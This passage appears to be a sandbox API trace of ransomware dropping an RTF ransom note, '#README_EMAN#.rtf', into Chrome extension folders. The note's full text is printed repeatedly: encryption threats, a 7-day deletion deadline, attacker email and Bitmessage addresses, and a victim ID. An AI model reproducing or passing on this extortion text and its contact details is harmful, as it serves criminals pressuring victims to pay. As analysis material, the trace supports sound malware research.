Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.660] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9a\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0281.660] WriteFile (in: hFile=0x2c8, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0281.661] CloseHandle (hObject=0x2c8) returned 1 [0281.661] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\#readme_eman#.rtf")) returned 0xffffffff [0281.661] GetLastError () returned 0x2 [0281.661] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0281.662] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 